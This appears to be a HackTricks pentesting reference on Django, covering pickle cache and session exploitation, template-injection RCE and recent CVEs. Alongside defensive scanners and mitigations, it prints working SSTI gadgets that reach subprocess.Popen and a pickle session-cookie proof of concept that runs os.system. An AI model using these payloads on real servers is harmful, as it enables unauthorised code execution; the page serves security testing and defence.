Django

tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Cache Manipulation to RCE

Django's default cache storage method is Python pickles, which can lead to RCE if untrusted input is unpickled. If an attacker can gain write access to the cache, they can escalate this weakness to RCE on the underlying server.

Django's cache is stored in one of four places: Redis, memory, files, or a database. A cache stored in a Redis server or a database is the most likely attack vector (Redis injection and SQL injection), but an attacker may also be able to use a file-based cache to turn an arbitrary file write into RCE. The maintainers have marked this as a non-issue. Note that the cache file directory, the SQL table name, and the Redis server details will vary between deployments.

This HackerOne report provides a great, reproducible example of exploiting Django cache stored in a SQLite database: https://hackerone.com/reports/1415436
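The root cause above is that pickle resolves and calls whatever global a stored entry names. The block below is an added example (not Django's code and not from the HackerOne report) showing the defensive side in plain Python: an allowlisting `Unpickler` that refuses any global outside a small set of data types, so a planted `__reduce__` entry raises instead of executing. `is_blocked`, `legit_entry` and `untrusted_entry` are constructed helpers for the demonstration; the gadget points at the harmless `os.getcwd` on purpose. Django's stock cache backends do not expose a hook for this loader, so in a real deployment the primary fix remains keeping the cache store out of reach (Redis authentication and network isolation, parameterised SQL, tight permissions on the file cache directory); the allowlist is what a custom backend or serializer would apply.

```python
import io
import os
import pickle

# Globals a cache entry may legitimately reference: data containers only.
# Callables such as os.system or subprocess.Popen are deliberately absent.
ALLOWED_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
    ("datetime", "datetime"),
    ("datetime", "date"),
    ("datetime", "timedelta"),
    ("decimal", "Decimal"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """find_class is the one hook pickle exposes before a referenced global is
    resolved, so an allowlist here stops __reduce__ gadgets before they run."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"cache entry references disallowed global {module}.{name}"
        )


def restricted_loads(data: bytes):
    """Drop-in for pickle.loads() that only admits allowlisted globals."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_blocked(data: bytes) -> bool:
    """True if the restricted loader refuses the entry (constructed helper)."""
    try:
        restricted_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


class _Gadget:
    # Same shape as a __reduce__ gadget, but pointing at a harmless callable
    # so the demonstration cannot do damage even under a plain pickle.loads().
    def __reduce__(self):
        return (os.getcwd, ())


def legit_entry() -> bytes:
    """A constructed, ordinary cache value as Django's backends would store it."""
    return pickle.dumps({"user_id": 42, "roles": ["editor"]}, pickle.HIGHEST_PROTOCOL)


def untrusted_entry() -> bytes:
    """A constructed entry of the kind someone with cache write access could plant."""
    return pickle.dumps(_Gadget(), pickle.HIGHEST_PROTOCOL)


if __name__ == "__main__":
    print("legit entry:", restricted_loads(legit_entry()))
    print("gadget blocked:", is_blocked(untrusted_entry()))
```

The allowlist is intentionally short: every module/name pair added to it is a new surface, so extend it only for types your application actually caches.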


Server-Side Template Injection (SSTI)

The Django Template Language (DTL) is Turing-complete. If user-supplied data is rendered as a template string (for example by calling Template(user_input).render() or when |safe/format_html() removes auto-escaping), an attacker may achieve full SSTI → RCE.

Detection

  1. Look for dynamic calls to Template() / Engine.from_string() / render_to_string() that include any unsanitised request data.
  2. Send a time-based or arithmetic payload:

```django
{{7*7}}
```

If the rendered output contains 49, the input is being compiled by the template engine.
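Step 1 above is a code-review task, and it is easy to miss sinks hidden behind an intermediate variable. The scanner below is an added example (not part of the page or of Django) that walks a view module's AST, tracks names assigned from `request`, and reports `Template()`, `from_string()` and `render_to_string()` calls whose template text (first positional argument, or the `template_string`/`template_code` keyword) is request-derived. Passing request data as template context is not reported, since that path is auto-escaped. `SAMPLE_VIEWS` is a constructed module used as input; the analysis is flow-insensitive and not scoped per function, which makes it over-report rather than under-report.

```python
import ast

# Template-compiling entry points the page names. For each, the template text
# is the first positional argument or one of these keywords.
SINKS = {"Template", "from_string", "render_to_string"}
SINK_KEYWORDS = {"template_string", "template_code"}


def _names_in(node: ast.AST) -> set:
    return {n.id for n in ast.walk(node) if isinstance(n, ast.Name)}


def _tainted_names(tree: ast.AST) -> set:
    """Names assigned (directly or transitively) from `request`.

    Flow-insensitive and not scoped per function, so it over-approximates;
    that is the right bias for a triage scanner."""
    tainted = {"request"}
    changed = True
    while changed:
        changed = False
        for node in ast.walk(tree):
            if isinstance(node, ast.Assign) and _names_in(node.value) & tainted:
                for target in node.targets:
                    if isinstance(target, ast.Name) and target.id not in tainted:
                        tainted.add(target.id)
                        changed = True
    return tainted


def _call_name(call: ast.Call):
    func = call.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return None


def find_ssti_sinks(source: str) -> list:
    """Return sorted (lineno, call_name) pairs for sink calls whose template
    text derives from request data. Request data passed only as context is
    not reported."""
    tree = ast.parse(source)
    tainted = _tainted_names(tree)
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        if name not in SINKS:
            continue
        template_args = list(node.args[:1]) + [
            kw.value for kw in node.keywords if kw.arg in SINK_KEYWORDS
        ]
        if any(_names_in(arg) & tainted for arg in template_args):
            findings.append((node.lineno, name))
    return sorted(findings)


# Constructed view module: two template-compiling sinks fed by request data
# and one safe view that passes request data only as context.
SAMPLE_VIEWS = """\
from django.template import Template, Context
from django.template.loader import render_to_string

def preview(request):
    body = request.POST.get("body", "")
    tpl = Template(body)
    return tpl.render(Context({}))

def safe(request):
    name = request.GET.get("name", "")
    return render_to_string("hello.html", {"name": name}, request=request)

def also_bad(request, engine):
    return engine.from_string("Hi " + request.GET["greeting"]).render(Context({}))
"""


if __name__ == "__main__":
    for lineno, name in find_ssti_sinks(SAMPLE_VIEWS):
        print(f"line {lineno}: {name}() compiles request-derived input")
```

Run it over each app's `views.py` (read the file and pass its text to `find_ssti_sinks`); every hit is a place where the fix is to move user data out of the template source and into the context.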

Primitive to RCE

Django blocks direct access to __import__, but the Python object graph is reachable:

```django
{{''.__class__.mro()[1].__subclasses__()}}
```

Find the index of subprocess.Popen (≈400–500, depending on the Python build) and execute arbitrary commands:

```django
{{''.__class__.mro()[1].__subclasses__()[438]('id',shell=True,stdout=-1).communicate()[0]}}
```

A safer universal gadget is to iterate until cls.__name__ == 'Popen'.

The same gadget works for Debug Toolbar or Django-CMS template rendering features that mishandle user input.


See also: ReportLab/xhtml2pdf PDF export RCE

Applications built on Django commonly integrate xhtml2pdf/ReportLab to export views as PDF. When user-controlled HTML flows into PDF generation, rl_safe_eval may evaluate expressions inside triple brackets [[[ ... ]]], enabling code execution (CVE-2023-33733). Details, payloads, and mitigations:

ReportLab xhtml2pdf triple-brackets expression evaluation RCE (CVE-2023-33733)


If the setting SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer' is enabled (or a custom serializer that deserialises pickle), Django decrypts and unpickles the session cookie before calling any view code. Therefore, possessing a valid signing key (the project SECRET_KEY by default) is enough for immediate remote code execution.

Exploit Requirements

  • The server uses PickleSerializer.
  • The attacker knows or can guess settings.SECRET_KEY (leaked via GitHub, .env files, error pages, etc.).

Proof-of-Concept

```python
#!/usr/bin/env python3
from django.contrib.sessions.serializers import PickleSerializer
from django.core import signing
import os, base64

class RCE(object):
    def __reduce__(self):
        return (os.system, ("id > /tmp/pwned",))

mal = signing.dumps(RCE(), key=b'SECRET_KEY_HERE', serializer=PickleSerializer)
print(f"sessionid={mal}")
```

Send the resulting cookie, and the payload will run with the privileges of the WSGI worker.

Mitigations: use the default JSONSerializer, rotate SECRET_KEY regularly, and set SESSION_COOKIE_HTTPONLY.
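Whether a deployment is exposed to this depends on which serializer signed the cookie, and that is visible from the cookie itself. The block below is an added example (not from the page and not Django code) that decodes the payload segment of a signed-cookie session value and reports whether it holds JSON, a pickle stream, or is just an opaque server-side session key. It assumes the layout produced by django.core.signing: `payload:timestamp:signature`, unpadded URL-safe base64, and a leading `.` when the payload was zlib-compressed. The signature is not verified, since only the format matters here; `sample_cookie` constructs inputs with placeholder timestamp and signature. One caveat for triage: Django deprecated PickleSerializer in 4.1 and removed it in 5.0, so on current releases a pickle finding implies a custom serializer.

```python
import base64
import json
import pickle
import zlib


def _b64url_encode(raw: bytes) -> str:
    # django.core.signing strips the '=' padding from URL-safe base64.
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")


def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def classify_session_cookie(value: str) -> str:
    """Inspect the payload segment of a Django signed-cookie session value.

    Returns 'pickle', 'json', 'opaque' (a random server-side session key from
    the db, cache or file backend, so the cookie carries no serialized data)
    or 'unknown'. Only the format is examined; the signature is not checked."""
    parts = value.split(":")
    if len(parts) < 3:
        return "opaque"
    payload = parts[0]
    try:
        if payload.startswith("."):  # prefix signing.dumps() adds when compress=True
            raw = zlib.decompress(_b64url_decode(payload[1:]))
        else:
            raw = _b64url_decode(payload)
    except (ValueError, zlib.error):
        return "unknown"
    if raw[:1] == b"\x80":  # PROTO opcode: every pickle at protocol >= 2 starts with it
        return "pickle"
    try:
        json.loads(raw)
    except ValueError:
        return "unknown"
    return "json"


def sample_cookie(serializer: str, compress: bool = False) -> str:
    """Constructed cookie values in django.core.signing's payload:timestamp:signature
    layout; timestamp and signature are placeholders because only the payload
    segment is classified."""
    session = {"_auth_user_id": "1", "_auth_user_backend": "django.contrib.auth.backends.ModelBackend"}
    if serializer == "json":
        raw = json.dumps(session).encode()
    else:
        raw = pickle.dumps(session, pickle.HIGHEST_PROTOCOL)
    if compress:
        segment = "." + _b64url_encode(zlib.compress(raw))
    else:
        segment = _b64url_encode(raw)
    return f"{segment}:1tA0bC:PLACEHOLDER_SIGNATURE"


if __name__ == "__main__":
    for kind in ("json", "pickle"):
        for compress in (False, True):
            cookie = sample_cookie(kind, compress)
            print(f"{kind:6} compress={compress!s:5} -> {classify_session_cookie(cookie)}")
    print("opaque key ->", classify_session_cookie("5iu3sjc0n2u3r4c9o7gybcr2rfb1vd5g"))
```

On a live application, point the function at the value of the `sessionid` cookie from a logged-in session; an `opaque` result means the serializer question must be answered from the settings file instead, because the data never leaves the server.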


High-Impact Django CVEs (2023-2025) Pentesters Should Check

  • CVE-2025-48432 – Log injection via unescaped request.path (fixed June 4 2025). Lets an attacker smuggle newlines/ANSI codes into log files and poison downstream log analysis. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2.
  • CVE-2024-42005 – Critical SQL injection in QuerySet.values()/values_list() on JSONField (CVSS 9.8). Craft JSON keys to break out of the quoting and run arbitrary SQL. Fixed in 4.2.15 / 5.0.8.
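The log-injection entry is worth a defence-in-depth control even on patched versions, because any other code that logs a request attribute has the same problem. The block below is an added example (not the page's and not Django's fix) of a `logging.Filter` that rewrites CR, LF, ESC and other control characters in a record's message and string arguments as literal `\xNN` sequences, so a crafted path can neither forge a second log line nor colour the terminal of whoever tails the log. The `LOGGING` dict shows how such a filter is wired into Django's logging config; the module path `myproject.logfilters` in it is an assumed location. `sanitized_message` is a constructed harness that builds a record the way the `django.request` logger would and returns what a handler would emit.

```python
import logging
import re

# Control characters that let a request path forge extra log lines (CR/LF) or
# inject terminal escape sequences (ESC) into whoever tails the log; this is
# the bug class behind CVE-2025-48432.
_CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def neutralize(text: str) -> str:
    """Rewrite each control character as a literal \\xNN so the text stays on
    one line and is inert in a terminal."""
    return _CONTROL.sub(lambda m: "\\x%02x" % ord(m.group()), text)


class ControlCharFilter(logging.Filter):
    """Sanitizes the message template and its string arguments in place."""

    def filter(self, record: logging.LogRecord) -> bool:
        record.msg = neutralize(str(record.msg))
        if isinstance(record.args, dict):
            record.args = {k: neutralize(v) if isinstance(v, str) else v
                           for k, v in record.args.items()}
        elif record.args:
            record.args = tuple(neutralize(a) if isinstance(a, str) else a
                                for a in record.args)
        return True


# Django settings fragment wiring the filter into the request logger.
# "myproject.logfilters" is an assumed module path for the class above.
LOGGING = {
    "version": 1,
    "disable_existing_loggers": False,
    "filters": {"ctrl": {"()": "myproject.logfilters.ControlCharFilter"}},
    "handlers": {"console": {"class": "logging.StreamHandler", "filters": ["ctrl"]}},
    "loggers": {"django.request": {"handlers": ["console"], "level": "WARNING"}},
}


def sanitized_message(msg: str, *args) -> str:
    """Constructed harness: build a record as the django.request logger would,
    run the filter, and return the text a handler would emit."""
    record = logging.LogRecord("django.request", logging.WARNING, "example.py", 0, msg, args, None)
    ControlCharFilter().filter(record)
    return record.getMessage()


if __name__ == "__main__":
    # Constructed hostile path: a newline to forge a second line plus an ANSI colour code.
    print(sanitized_message("Not Found: %s", "/admin\nERROR forged line\x1b[31m"))
```

Attach the filter to handlers rather than to a single logger so it also covers third-party loggers that echo request data; a filter on a logger only sees records created through that logger.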

Always fingerprint the exact framework version (via the X-Frame-Options error page or the hash of /static/admin/css/base.css) and test the items above where applicable.


References

  • Django security release – "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" – 4 Jun 2025.
  • OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" – 11 Aug 2024.
  • 0xdf: University (HTB) – Exploiting xhtml2pdf/ReportLab CVE-2023-33733 to gain RCE and pivot into AD – https://0xdf.gitlab.io/2025/08/09/htb-university.html
